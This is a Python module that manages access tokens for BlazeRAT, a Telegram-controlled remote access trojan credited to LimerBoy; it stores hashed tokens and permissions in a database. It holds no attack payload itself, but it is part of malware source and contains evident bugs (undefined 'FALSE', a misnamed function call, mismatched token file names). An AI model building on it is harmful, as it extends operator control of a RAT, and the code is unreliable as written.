| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142 |
- #!/usr/bin/python3
- # -*- coding: utf-8 -*-
- # Import modules
- from uuid import uuid4
- from config import perms
- from hashlib import sha512
- from json import loads, dumps
- from services.startup import CURRENT_DIRECTORY
- from core.database import connection, cursor, lock
- from os import path
- """
- Author : LimerBoy
- github.com/LimerBoy/BlazeRAT
- Notes :
- The file is needed
- to work with authorization tokens.
- """
- # Write telegram bot api token
- def WriteTelegramBotAPI_Token(token: str) -> None:
- with open(CURRENT_DIRECTORY + "/token.txt", "w") as api_token:
- api_token.write(token)
- def ReadTokenFromFile() -> tuple:
- token_file = path.join(CURRENT_DIRECTORY, "conf.txt")
- if not path.exists(token_file):
- return False, ""
- with open(token_file, "r") as api_token:
- token = api_token.read()
- return True, token
- def WriteTokenToFile(toke:str)-> bool:
- token_file = path.join(CURRENT_DIRECTORY, "conf.txt")
- with open(token_file, "w") as file:
- file.write(toke)
- return True
- def VerifyToken2(toke: str) -> tuple:
- token_file = path.join(CURRENT_DIRECTORY, "conf.txt")
- if not path.exists(token_file):
- return FALSE, "unknown"
- with open(token_file, "r") as api_token:
- token = api_token.read()
- return True, token
- # with open("conf.txt", "w") as file:
- # file.write(toke)
- # return True, token
-
- # Verify token
- def VerifyToken(token: str) -> tuple:
- sql = "SELECT name FROM tokens WHERE token=?"
- hsh = TokenToHash(token)
- cursor.execute(sql, (hsh,))
- result = cursor.fetchone()
- if result is not None:
- return True, result[0]
- else:
- return False, "Unknown"
- # Convert token to hash
- def TokenToHash(token: str) -> str:
- return sha512(b"TOKEN:" + token.encode()).hexdigest()
- """ List permissions """
- def EnumeratePermissions(token_name: str, have=True, console=True) -> str:
- result = f"Token '{token_name}' have permissions:\n\n" if have else f"All permissions for token '{token_name}'\n\n"
- # Emoji
- if console is True:
- y, n = "[+]", "[-]"
- else:
- y, n = "✅", "⛔"
- # Enum
- for permission in perms.keys():
- description = perms[permission]
- if TokenContainsPermission(token_name, permission):
- result += f"{y} {permission} - {description}\n"
- else:
- if not have:
- result += f"{n} {permission} - {description}\n"
- return result
- """ Check if token have permission """
- def TokenContainsPermission(token_name: str, permission: str) -> bool:
- sql = "SELECT permissions FROM tokens WHERE name=?"
- cursor.execute(sql, (token_name,))
- result = cursor.fetchone()
- # Check if token exists
- if not result:
- return False
- # Check root perms
- if result[0] == "*":
- return True
- # Check other perms
- else:
- return permission in loads(result[0])
- """ Create token with permissions """
- def TokenCreate(name: str, permissions: list) -> str:
- lock.acquire(True)
- exists, token = ReadTokenFromFile()
- if exists is False:
- token = uuid4().urn[9:]
- writeTokenToFile(token)
- print(f"token={token}")
-
- # Create new token
- sql = "INSERT INTO tokens (token, name, permissions) VALUES (?, ?, ?)"
- hsh = TokenToHash(token)
- # Get permissions
- if "*" in permissions:
- perms = "*"
- else:
- perms = dumps(permissions)
- # Execute sql & commit changes
- cursor.execute(sql, (hsh, name, perms))
- # Done
- connection.commit()
- lock.release()
- return token
- """ Delete token """
- def TokenDelete(name: str) -> bool:
- # Check if token exists
- sql = "SELECT id FROM tokens WHERE name=?"
- cursor.execute(sql, (name,))
- result = cursor.fetchone()
- # Delete token
- if result is not None:
- lock.acquire(True)
- sql = "DELETE FROM tokens WHERE id=?"
- cursor.execute(sql, (result[0],))
- connection.commit()
- lock.release()
- return True
- else:
- return False
|
